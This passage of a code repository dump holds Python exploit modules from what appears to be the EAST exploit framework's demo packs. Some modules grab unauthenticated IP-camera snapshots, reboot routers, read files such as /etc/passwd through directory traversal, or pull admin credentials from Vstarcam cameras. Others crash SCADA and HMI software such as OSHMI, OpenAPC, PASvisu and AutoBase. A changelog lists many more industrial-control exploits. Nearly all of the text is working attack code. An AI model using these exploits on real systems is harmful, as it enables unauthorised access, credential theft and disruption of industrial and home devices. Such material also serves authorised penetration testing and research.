| INFO["LINKS"] = [] 19 | INFO['CHANGELOG']="12 Apr, 2017" 20 | INFO['PATH'] = "General/" 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.45" 25 | OPTIONS["PORT"] = 80 26 | 27 | 28 | class exploit(Sploit): 29 | def __init__(self,host="", 30 | port=0, ssl=False, 31 | logger=None): 32 | Sploit.__init__(self, logger=logger) 33 | 34 | def args(self): 35 | self.args = Sploit.args(self, OPTIONS) 36 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 37 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 38 | 39 | def make_url(self, path=''): 40 | return 'http://%s:%s/%s' % (self.host, self.port, path) 41 | 42 | def make_request(self, path=''): 43 | url = self.make_url(path) 44 | res = urllib2.urlopen(url) 45 | return res.read() 46 | 47 | def run(self): 48 | #Get options from gui 49 | self.args() 50 | self.log('[*] Trying to get snapshot') 51 | res = self.make_request('onvif/snapshot') 52 | self.logImage(res) 53 | self.finish(True) 54 | 55 | 56 | if __name__ == '__main__': 57 | """ 58 | By now we only have the tool 59 | mode for exploit.. 60 | Later we would have 61 | standalone mode also. 62 | """ 63 | print "Running exploit %s .. " % INFO['NAME'] 64 | e = exploit("192.168.0.1",80) 65 | e.run() 66 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_iball_adsl2_router_rr.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import urllib2 8 | import time 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_iball_adsl2_router_rr" 15 | INFO['DESCRIPTION'] = "iBall ADSL2+ Home Router - Reset Router" 16 | INFO['VENDOR'] = "https://www.iball.co.in" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['http://0day.today/exploit/28572'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """ 21 | iBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. Firmware version: FW_iB-LR7011A_1.0.2 22 | """ 23 | 24 | INFO['CHANGELOG'] = "20 Sep, 2017. Written by Gleg team." 25 | INFO['PATH'] = 'Exploits/Hardware/' 26 | 27 | # Must be in every module, to be set by framework 28 | OPTIONS = {} 29 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Target IP') 30 | OPTIONS["PORT"] = 80 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | self.host = self.args.get('HOST', self.host) 43 | 44 | def make_url(self, path = ''): 45 | return 'http://{}:{}{}'.format(self.host, self.port, path) 46 | 47 | def run(self): 48 | self.args() 49 | self.log("Attacking {}".format(self.host)) 50 | 51 | #url = self.make_url('/info.cgi') 52 | #try: 53 | # fd = urllib2.urlopen(url) 54 | # self.log(fd.read()) 55 | #except Exception as e: 56 | # self.log(e) 57 | # self.finish(False) 58 | 59 | url = self.make_url('/resetrouter.cgi') 60 | request = urllib2.Request(url) 61 | try: 62 | fd = urllib2.urlopen(request) 63 | result = fd.read() 64 | except Exception as e: 65 | self.log(e) 66 | self.finish(False) 67 | self.log('The DSL Router is rebooting.') 68 | self.finish(True) 69 | 70 | if __name__ == '__main__': 71 | """ 72 | By now we only have the tool mode for exploit.. 73 | Later we would have standalone mode also. 74 | """ 75 | 76 | print "Running exploit %s .. " % INFO['NAME'] 77 | e = exploit('', 80) 78 | e.run() 79 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_orient_ip33_sh14cp_snapshot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import urllib 5 | import os 6 | import struct 7 | import tarfile 8 | import base64 9 | from cStringIO import StringIO 10 | import time 11 | from collections import OrderedDict 12 | from core.WebHelper import FormPoster 13 | from Sploit import Sploit 14 | 15 | INFO = {} 16 | INFO['NAME'] = "efa_orient_ip33_sh14cp_snapshot" 17 | INFO['DESCRIPTION'] = "Orient IP-33-SH14CP IP Camera Snapshot" 18 | INFO['VENDOR'] = "http://www.orientrus.ru/" 19 | INFO["CVE Name"] = "0day" 20 | INFO["DOWNLOAD_LINK"] = "" 21 | INFO["LINKS"] = [] 22 | INFO['CHANGELOG'] = "12 May, 2017" 23 | INFO['PATH'] = "General/" 24 | INFO["NOTES"] = """ 25 | Unauthorized attacker can make snapshot. 26 | Tested against firmware 3518C_IMX225_W_6.1.23.2_A3. 27 | """ 28 | 29 | # Must be in every module, to be set by framework 30 | OPTIONS = OrderedDict() 31 | OPTIONS["HOST"] = "192.168.1.13" 32 | OPTIONS["PORT"] = 80 33 | 34 | 35 | class exploit(Sploit): 36 | def __init__(self,host="", 37 | port=0, ssl=False, 38 | logger=None): 39 | Sploit.__init__(self, logger=logger) 40 | 41 | def args(self): 42 | self.args = Sploit.args(self, OPTIONS) 43 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 44 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 45 | 46 | def make_url(self, path=''): 47 | url = 'http://{}:{}/{}'.format(self.host, self.port, path) 48 | return url 49 | 50 | def run(self): 51 | #Get options from gui 52 | self.args() 53 | self.log("[*] Trying to connect to {}".format(self.make_url())) 54 | url = self.make_url('snap.jpg') 55 | res = urllib2.urlopen(url).read() 56 | self.logImage(res) 57 | self.finish(True) 58 | 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only have the tool 63 | mode for exploit.. 64 | Later we would have 65 | standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1",80) 69 | e.run() 70 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_tp_link_tl_wa850re_rr.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import urllib2 8 | import time 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_tp_link_tl_wa850re_rr" 15 | INFO['DESCRIPTION'] = "TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthorized Remote Reboot" 16 | INFO['VENDOR'] = "https://www.tp-link.com/" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://packetstormsecurity.com/files/147397/TP-Link-Technologies-TL-WA850RE-Wi-Fi-Range-Extender-Unauthorized-Remote-Reboot.html'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """ 21 | TP-Link Technologies TL-WA850RE Wi-Fi Range Extender suffers from an unauthorized remote reboot vulnerability. 22 | """ 23 | 24 | INFO['CHANGELOG'] = "28 Apr, 2018. Written by Gleg team." 25 | INFO['PATH'] = 'Exploits/Hardware/' 26 | 27 | # Must be in every module, to be set by framework 28 | OPTIONS = {} 29 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Target IP') 30 | OPTIONS["PORT"] = 80 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | self.host = self.args.get('HOST', self.host) 43 | 44 | def make_url(self, path = ''): 45 | return 'http://{}:{}{}'.format(self.host, self.port, path) 46 | 47 | def run(self): 48 | self.args() 49 | self.log("Attacking {}".format(self.host)) 50 | 51 | url = self.make_url('/data/reboot.json') 52 | data = 'operation=write' 53 | 54 | request = urllib2.Request(url, data) 55 | request.add_header('X-Requested-With', 'XMLHttpRequest') 56 | request.add_header('Accept', 'application/json, text/javascript, */*;') 57 | request.add_header('Cookie', 'COOKIE=') 58 | try: 59 | fd = urllib2.urlopen(request) 60 | result = fd.read() 61 | except Exception as e: 62 | self.log(e) 63 | self.finish(False) 64 | self.log('Router is rebooting.') 65 | self.finish(True) 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool mode for exploit.. 70 | Later we would have standalone mode also. 71 | """ 72 | 73 | print "Running exploit %s .. " % INFO['NAME'] 74 | e = exploit('', 80) 75 | e.run() 76 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_uc_httpd_directory_traversal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import httplib 5 | import sys 6 | httplib.HTTPConnection._http_vsn = 10 7 | httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0' 8 | from collections import OrderedDict 9 | from Sploit import Sploit 10 | 11 | INFO = {} 12 | INFO['NAME'] = "efa_uc_httpd_directory_traversal" 13 | INFO['DESCRIPTION'] = "uc-httpd Daemon Directory Traversal/LFI" 14 | INFO['VENDOR'] = "" 15 | INFO["CVE Name"] = "" 16 | INFO["DOWNLOAD_LINK"] = "" 17 | INFO["LINKS"] = [] 18 | INFO['CHANGELOG']="03 Apr, 2017. Written by Gleg team." 19 | INFO['PATH'] = "General/" 20 | INFO["NOTES"] = """ 21 | uc-httpd is a HTTP daemon used by a wide array of IoT devices (primarily security cameras) which is vulnerable 22 | to local file inclusion and directory traversal bugs. There are a few million total vulnerable devices, with 23 | around one million vulnerable surviellence cameras. 24 | 25 | The following request can be made to display the contents of the 'passwd' file: 26 | GET ../../../../../etc/passwd HTTP/1.0 27 | 28 | To display a directory listing, the following request can be made: 29 | GET ../../../../../var/www/html/ HTTP/1.0 30 | The above request would output the contents of the webroot directory as if 'ls' command was executed 31 | """ 32 | 33 | # Must be in every module, to be set by framework 34 | OPTIONS = OrderedDict() 35 | OPTIONS["HOST"] = "192.168.1.2" 36 | OPTIONS["PORT"] = 8000 37 | OPTIONS["FILENAME"] = '../../../../../etc/passwd' 38 | 39 | 40 | class exploit(Sploit): 41 | def __init__(self,host="", 42 | port=0, ssl=False, 43 | logger=None): 44 | Sploit.__init__(self, logger=logger) 45 | 46 | def args(self): 47 | self.args = Sploit.args(self, OPTIONS) 48 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 49 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 50 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 51 | 52 | def make_req(self, path=''): 53 | url = 'http://%s:%s/%s' % (self.host, self.port, path) 54 | res = urllib2.urlopen(url).read() 55 | return res 56 | 57 | def run(self): 58 | #Get options from gui 59 | self.args() 60 | self.log('[*] Connecting to %s:%s' % (self.host, self.port)) 61 | self.make_req() 62 | self.log('[*] Getting contents of %s' % self.filename) 63 | res = self.make_req(self.filename) 64 | self.log(res) 65 | self.finish(True) 66 | 67 | 68 | if __name__ == '__main__': 69 | """ 70 | By now we only have the tool 71 | mode for exploit.. 72 | Later we would have 73 | standalone mode also. 74 | """ 75 | print "Running exploit %s .. " % INFO['NAME'] 76 | e = exploit("192.168.0.1",80) 77 | e.run() 78 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_vstarcom_ip_camera_info_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import httplib 5 | from collections import OrderedDict 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efa_vstarcom_ip_camera_info_disclosure" 11 | INFO['DESCRIPTION'] = "Vstarcam T6892 Information Disclosure" 12 | INFO['VENDOR'] = "http://www.vstarcam.com/" 13 | INFO["CVE Name"] = "2017-5674" 14 | INFO["NOTES"] = """ 15 | Vulnerability allows to get admin credentials. 16 | """ 17 | INFO["DOWNLOAD_LINK"] = "" 18 | INFO["LINKS"] = [] 19 | INFO['CHANGELOG']="13 Apr, 2017" 20 | INFO['PATH'] = "General/" 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.42" 25 | OPTIONS["PORT"] = 81 26 | 27 | 28 | class exploit(Sploit): 29 | def __init__(self,host="", 30 | port=0, ssl=False, 31 | logger=None): 32 | Sploit.__init__(self, logger=logger) 33 | 34 | def args(self): 35 | self.args = Sploit.args(self, OPTIONS) 36 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 37 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 38 | 39 | def run(self): 40 | #Get options from gui 41 | self.args() 42 | self.log("[*] Connecting to %s:%s" % (self.host, self.port)) 43 | h1 = httplib.HTTPConnection(self.host, self.port) 44 | h1.request('GET', 'login.cgi') 45 | r1 = h1.getresponse().read() 46 | self.log('[+] Admin credentials are:\r\n%s' % r1) 47 | self.finish(True) 48 | 49 | 50 | if __name__ == '__main__': 51 | """ 52 | By now we only have the tool 53 | mode for exploit.. 54 | Later we would have 55 | standalone mode also. 56 | """ 57 | print "Running exploit %s .. " % INFO['NAME'] 58 | e = exploit("192.168.0.1",80) 59 | e.run() 60 | -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/LICENSE.txt: -------------------------------------------------------------------------------- 1 | https://www.gnu.org/licenses/gpl-3.0.txt -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/changelog.txt: -------------------------------------------------------------------------------- 1 | 2 | 1.0 3 | September 18, 2022 4 | 5 | efa_delta_mcis_upsentry2012_info_disclosure.py 6 | efa_open_source_erp_arbitrary_sql_execution.py 7 | efa_open_source_erp_dir_trav.py 8 | efs_advantech_webaccess_8_3_2_dashboardconfig_afd.py 9 | efs_advantech_webaccess_8_3_2_dashboard_bsqli.py 10 | efs_advantech_webaccess_8_3_directory_traversal.py 11 | efs_advantech_webaccess_8_3_file_delete.py 12 | efs_advantech_webaccess_dashboardeditor_afd.py 13 | efs_atvise_3_2_afd.py 14 | efs_atvise_3_2_info_disclosure.py 15 | efs_autobase_netserver_dos.py 16 | efs_Becknoff_CX9020_Reboot.py 17 | efs_cogent_datahub_7_3_x_dos.py 18 | efs_delta_DIAEnergie_info_disclosure.py 19 | efs_DELTA_IA_Robot_DRAstudio_afd.py 20 | efs_DoMore_Designer_afd.py 21 | efs_eisbaer_scada_directory_traversal2.py 22 | efs_eisbaer_scada_dt.py 23 | efs_Elipse_E3_e3server_remote_stop.py 24 | efs_esa_automation_crew_webserver_dir_trav.py 25 | efs_GP_PRO_EX_WinGP_Runtime_afd.py 26 | efs_indigo_scada_information_disclosure.py 27 | efs_inductive_automation_7_6_4_designer_xxe.py 28 | efs_inductive_automation_ignition_7_5_4_bSQLi.py 29 | efs_inductive_automation_ignition_7_5_4_xxe.py 30 | efs_infrasightlabs_vscopeserver_privilege_escalation.py 31 | efs_IPESOFT_D2000_SCADA_DirTrav.py 32 | efs_kingscada_aeserver_dos.py 33 | efs_laquis_scada_directory_traversal.py 34 | efs_logi_cals_logi_RTS_dir_trav.py 35 | efs_logi_cals_logi_RTS_RTShttpd_DoS.py 36 | efs_loytec_lweb900_server_dir_trav.py 37 | efs_lsis_wXP_DoS.py 38 | efs_lsis_XP_Manager_DoS.py 39 | efs_moxa_mxview_dos.py 40 | efs_OpenAPC_BeamServer_DoS.py 41 | efs_OSHMI_remote_shutdown.py 42 | efs_PASvisu_dos.py 43 | efs_PeakHMI_Webserver_DirTrav.py 44 | efs_promotic_scada_dos.py 45 | efs_quickhmi_directory_traversal.py 46 | efs_rcware_dos.py 47 | efs_reliance_scada_directory_traversal.py 48 | efs_s3scada_remote_stop.py 49 | efs_SpiderControl_SCADA_Editor_DirTrav.py 50 | efs_trihedral_vtscada_dos.py 51 | efs_u_motion_builder_hardcoded_credentials.py 52 | efs_vbase_vokserver_info_disclosure.py 53 | efs_winplc7_webserver_arbitrary_file_disclosure.py 54 | efs_wintr_scada_hardcoded_credentials_directory_traversal.py -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efa_open_source_erp_dir_trav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import urllib2 3 | import cookielib 4 | import json 5 | from collections import OrderedDict 6 | 7 | 8 | from Sploit import Sploit 9 | 10 | INFO = {} 11 | INFO['NAME'] = "efa_open_source_erp_dir_trav" 12 | INFO['DESCRIPTION'] = "OpenSource ERP Directory Traversal" 13 | INFO['VENDOR'] = "http://www.nelson-it.ch/" 14 | INFO["CVE Name"] = "0day" 15 | INFO["DOWNLOAD_LINK"] = "http://www.nelson-it.ch/download/" 16 | INFO["LINKS"] = [] 17 | INFO['CHANGELOG'] = "1 Jun, 2018" 18 | INFO['PATH'] = "WEB/" 19 | INFO["NOTES"] = """ 20 | Remote attacker can read arbitrary files on server using '\..' combination. 21 | Tested against OpenSource ERP 6.3.0 on Windows 7 x64 SP1. 22 | """ 23 | 24 | # Must be in every module, to be set by framework 25 | OPTIONS = OrderedDict() 26 | OPTIONS["HOST"] = "192.168.1.103" 27 | OPTIONS["PORT"] = 8024 28 | OPTIONS["FILENAME"] = "windows/win.ini" 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self,host="", 33 | port=0, ssl=False, 34 | logger=None): 35 | Sploit.__init__(self, logger=logger) 36 | self.payload = "" 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 41 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 42 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]).replace('/', '\\') 43 | 44 | def make_url(self, path=''): 45 | url = 'http://{}:{}/'.format(self.host, self.port) + path 46 | return url 47 | 48 | def run(self): 49 | # Get options from gui 50 | self.args() 51 | self.log('[*] Trying to recieve ' + self.filename) 52 | url = self.make_url('main/login/' + '..\\'*8 + self.filename) 53 | res = urllib2.urlopen(url).read() 54 | if res < 15000: 55 | self.log(res) 56 | self.writefile(res, self.filename.replace('\\', '/').split('/').pop()) 57 | self.log(res) 58 | self.finish(True) 59 | 60 | 61 | if __name__ == '__main__': 62 | """ 63 | By now we only have the tool 64 | mode for exploit.. 65 | Later we would have 66 | standalone mode also. 67 | """ 68 | print "Running exploit %s .. " % INFO['NAME'] 69 | e = exploit("192.168.0.1",80) 70 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_OSHMI_remote_shutdown.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import json 5 | import socket 6 | import time 7 | from collections import OrderedDict 8 | from Sploit import Sploit 9 | 10 | 11 | INFO = {} 12 | INFO['NAME'] = "efs_OSHMI_remote_shutdown" 13 | INFO['DESCRIPTION'] = "OSHMI remote shutdown" 14 | INFO['VENDOR'] = "https://sourceforge.net/projects/oshmiopensubstationhmi/" 15 | INFO["CVE Name"] = "0day" 16 | INFO["DOWNLOAD_LINK"] = "https://sourceforge.net/projects/oshmiopensubstationhmi/" 17 | INFO["LINKS"] = [] 18 | INFO['CHANGELOG'] = "7 Jun, 2018" 19 | INFO['PATH'] = "General/" 20 | INFO["NOTES"] = """ 21 | Specially crafted HTTP request allows to shutdown webserver. Authentication is not required. 22 | Tested against OSHMI 4.15 on Windows 7 SP1 x64. 23 | """ 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = OrderedDict() 27 | OPTIONS["HOST"] = "192.168.1.103" 28 | OPTIONS["PORT"] = 51909 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host="", 33 | port=0, ssl=False, 34 | logger=None): 35 | Sploit.__init__(self, logger=logger) 36 | self.name = INFO['NAME'] 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 41 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 42 | 43 | def make_url(self, path=''): 44 | url = "http://%s:%s/%s" % (self.host, self.port, path) 45 | return url 46 | 47 | def run(self): 48 | # Get options from gui 49 | self.args() 50 | self.log('[*] Sending shutdown request') 51 | url = self.make_url('htdocs/shellapi.rjs?Y') 52 | res = urllib2.urlopen(url).read() 53 | if 'error' in res and 'none' in res: 54 | self.log('[+] Request successfully executed') 55 | else: 56 | self.log('[-] Request execution failed') 57 | self.log('[*] Checking service') 58 | time.sleep(5) 59 | try: 60 | res = urllib2.urlopen(url, timeout=10) 61 | except socket.timeout as e: 62 | self.log('[+] Service not responds') 63 | self.finish(True) 64 | self.finish(False) 65 | 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool 70 | mode for exploit.. 71 | Later we would have 72 | standalone mode also. 73 | """ 74 | print "Running exploit %s .. " % INFO['NAME'] 75 | e = exploit("192.168.0.1", 80) 76 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_OpenAPC_BeamServer_DoS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import time 5 | from collections import OrderedDict 6 | from Sploit import Sploit 7 | 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_OpenAPC_BeamServer_DoS" 11 | INFO['DESCRIPTION'] = "OpenAPC BeamServer DoS" 12 | INFO['VENDOR'] = "https://www.openapc.com/" 13 | INFO["CVE Name"] = "0day" 14 | INFO["DOWNLOAD_LINK"] = "https://www.openapc.com/download.php" 15 | INFO["LINKS"] = [] 16 | INFO['CHANGELOG'] = "8 Jun, 2018" 17 | INFO['PATH'] = "General/" 18 | INFO["NOTES"] = """ 19 | Specially crafted TCP request crashes BeamServer.exe. 20 | Tested against OpenAPC 5.3-1 on Windows 7 SP1 x64. 21 | """ 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.103" 26 | OPTIONS["PORT"] = 11350 27 | 28 | 29 | class exploit(Sploit): 30 | def __init__(self, host="", 31 | port=0, ssl=False, 32 | logger=None): 33 | Sploit.__init__(self, logger=logger) 34 | self.name = INFO['NAME'] 35 | 36 | def args(self): 37 | self.args = Sploit.args(self, OPTIONS) 38 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 39 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 40 | 41 | def run(self): 42 | # Get options from gui 43 | self.args() 44 | self.log('[*] Testing connection to BeamServer') 45 | s = socket.socket() 46 | s.connect((self.host, self.port)) 47 | self.log('[*] Sending DoS packet') 48 | s.send('CmdListName\r\n') 49 | self.log('[*] Checking BeamServer...') 50 | time.sleep(5) 51 | try: 52 | s.connect((self.host, self.port)) 53 | except: 54 | self.log('[+] Service not responds') 55 | self.finish(True) 56 | self.log('[-] Service is still alive') 57 | self.finish(False) 58 | 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only have the tool 63 | mode for exploit.. 64 | Later we would have 65 | standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1", 80) 69 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_PASvisu_dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import socket 5 | from collections import OrderedDict 6 | from Sploit import Sploit 7 | 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_PASvisu_dos" 11 | INFO['DESCRIPTION'] = "Pilz PASvisu DoS" 12 | INFO['VENDOR'] = "https://www.pilz.com" 13 | INFO["CVE Name"] = "0day" 14 | INFO["DOWNLOAD_LINK"] = "" 15 | INFO["LINKS"] = [] 16 | INFO['CHANGELOG'] = "22 Sep, 2017" 17 | INFO['PATH'] = "General/" 18 | INFO["NOTES"] = """ 19 | Specially crafted TCP request cause DoS. Authentication is not required. 20 | Tested against PASvisu 1.4 on Windows 7 SP1 x64. 21 | """ 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.176" 26 | OPTIONS["PORT"] = 40856 27 | 28 | 29 | class exploit(Sploit): 30 | def __init__(self, host="", 31 | port=0, ssl=False, 32 | logger=None): 33 | Sploit.__init__(self, logger=logger) 34 | self.name = INFO['NAME'] 35 | 36 | def args(self): 37 | self.args = Sploit.args(self, OPTIONS) 38 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 39 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 40 | 41 | def make_url(self, path=''): 42 | url = "http://%s:%s/%s" % (self.host, self.port, path) 43 | return url 44 | 45 | def run(self): 46 | # Get options from gui 47 | self.args() 48 | self.log('[*] Sending DoS request') 49 | url = self.make_url('license_update/export') 50 | try: 51 | res = urllib2.urlopen(url, timeout=10) 52 | except socket.timeout as e: 53 | self.log('[+] Server not responds') 54 | self.finish(True) 55 | self.finish(False) 56 | 57 | 58 | if __name__ == '__main__': 59 | """ 60 | By now we only have the tool 61 | mode for exploit.. 62 | Later we would have 63 | standalone mode also. 64 | """ 65 | print "Running exploit %s .. " % INFO['NAME'] 66 | e = exploit("192.168.0.1", 80) 67 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_autobase_netserver_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import time 7 | import socket 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | 12 | INFO = {} 13 | INFO['NAME'] = "efs_autobase_netserver_dos" 14 | INFO['DESCRIPTION'] = "AutoBase Network Server 10.2.6.1 Denial Of Service" 15 | INFO['VENDOR'] = "http://www.autobase.biz" 16 | INFO['DOWNLOAD_LINK'] = 'http://file.autobase.biz/Autobase/ExeFiles/Autobase_10_2_6.exe' 17 | INFO['LINKS'] = '' 18 | INFO["CVE Name"] = "0-day" 19 | INFO["NOTES"] = """ 20 | Tested against AutoBase Network Server 10.2.6.1 21 | """ 22 | 23 | INFO['CHANGELOG'] = "10 Mar, 2016. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/DoS/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS["HOST"] = "127.0.0.1" 29 | OPTIONS["PORT"] = 7001 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host = "", port = 0, logger = None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.host = host 36 | self.port = port 37 | self.ssl = None 38 | self.state = "running" 39 | return 40 | 41 | def args(self): 42 | self.args = Sploit.args(self, OPTIONS) 43 | self.host = self.args.get('HOST', self.host) 44 | self.port = int(self.args.get('PORT', self.port)) 45 | return 46 | 47 | def makesploit(self): 48 | return 'A' * 1024 49 | 50 | def run(self): 51 | self.args() 52 | self.log("Attacking {}".format(self.host)) 53 | 54 | data = self.makesploit() 55 | for i in xrange(10000): 56 | s = socket.socket() 57 | #s.settimeout(10) 58 | try: 59 | s.connect((self.host, self.port)) 60 | s.sendall(data) 61 | s.close() 62 | except: 63 | self.log("Attack reported no open socket - service died?") 64 | self.log("Service died after {} sent packets".format(i)) 65 | self.finish(True) 66 | return 1 67 | 68 | self.log("Finished this exploit") 69 | self.finish(False) 70 | if __name__ == '__main__': 71 | """ 72 | By now we only have the tool mode for exploit.. 73 | Later we would have standalone mode also. 74 | """ 75 | print "Running exploit %s .. " % INFO['NAME'] 76 | e = exploit('', 80) 77 | e.run() 78 | -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_cogent_datahub_7_3_x_dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import errno 5 | import socket 6 | from collections import OrderedDict 7 | 8 | from Sploit import Sploit 9 | INFO = {} 10 | INFO['NAME'] = "efs_cogent_datahub_7_3_x_dos" 11 | INFO['DESCRIPTION'] = "Cogent Datahub 7.3.x Denial of Service" 12 | INFO['VENDOR'] = "http://www.cogentdatahub.com/" 13 | INFO["CVE Name"] = "" 14 | INFO["NOTES"] = """ 15 | Specially crafted GET request cause DoS. Also works on version 8. 16 | Checked against version 7.3.14.585 and 8.0 on Windows 7 SP1 x64. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "http://www.cogentdatahub.com/Download_Software.html" 19 | INFO["LINKS"] = [""] 20 | INFO['CHANGELOG']="17 Nov, 2017. Written by Gleg team." 21 | INFO['PATH'] = "Dos/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.176" 26 | OPTIONS["PORT"] = 80 27 | OPTIONS["BASEPATH"] = "/" 28 | 29 | 30 | class exploit(Sploit): 31 | def __init__(self,host="", 32 | port=0, ssl=False, 33 | logger=None): 34 | Sploit.__init__(self, logger=logger) 35 | self.listener_port = None 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 40 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 41 | self.vhost = self.args.get("BASEPATH", OPTIONS["BASEPATH"]) 42 | self.vhost = self.vhost if self.vhost.endswith("/") else self.vhost + "/" 43 | self.url = "http://{}:{}/{}".format(self.host, self.port, self.vhost) + 